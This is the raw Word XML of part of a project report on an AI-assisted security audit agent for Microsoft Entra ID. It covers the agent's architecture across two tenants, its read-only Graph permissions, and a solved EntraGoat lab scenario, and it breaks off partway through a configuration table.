        <w:t>Solved Scenario 1, “Misowned and Dangerous,” manually first, then extended the agent's toolset (get_user_owned_objects, get_user_owned_devices, get_user_owned_groups, get_sp_role_assignments, get_sp_directory_roles, get_role_members) and reproduced the findings through the agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605DCEA9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scenarios 2–5 were not attempted in this round; see Section 9, Future Work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CE002A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE90BC5" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc243301426"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Project Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0D756D78" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The solution spans two Azure tenants, bridged by a local Python script. The Cybersteps tenant hosts the Azure OpenAI reasoning engine; the Pearson tenant hosts the Entra ID environment under audit, including the EntraGoat vulnerable scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF55375" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A37EFCC" wp14:editId="1EF70F72">
            <wp:extent cx="5524500" cy="27051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05100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F988E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 1. Three-tenant architecture: Cybersteps, the local bridge script, and Pearson.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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3200"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="4600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="6EE93FDA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11DC4C8A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B711283" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tenant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BE01743" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7BDA6176" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05437839" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Azure OpenAI (gpt-5-mini)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0867D716" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cybersteps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12B31932" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Reasoning engine (“the brain”)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="5B6124B0" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03D9E4F5" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Entra ID / Microsoft Graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59312C7F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pearson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E84E565" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Audit target, including EntraGoat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7AD8ED2F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38C95B57" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Python script (local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FC1E58F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C906754" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Bridges both tenants; tenants never communicate directly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="679ED4C6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F102506" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>App registration entra-audit-agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5969483F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pearson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37057679" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Grants the script read access via client credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5355A172" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171F7360" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authentication flow: the script authenticates to Pearson with a client ID and secret, receives a Graph access token, retrieves tenant data, forwards it with a prompt to Azure OpenAI, and returns the model's analysis to the operator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99DF00" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CD486" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:spacing w:before="400"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc243301427"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Entra ID Access Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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2600"/>
        <w:gridCol w:w="6900"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="4C13BD4B"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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5541E422" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BD9C2D1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="0836F81A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C51B945" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>App registration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="563D496F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>entra-audit-agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="56B528E2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FD8A994" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Graph permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75EE6C14" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>User.Read.All, Directory.Read.All, Policy.Read.All, RoleManagement.Read.Directory, AuditLog.Read.All</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7E6DDCB2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
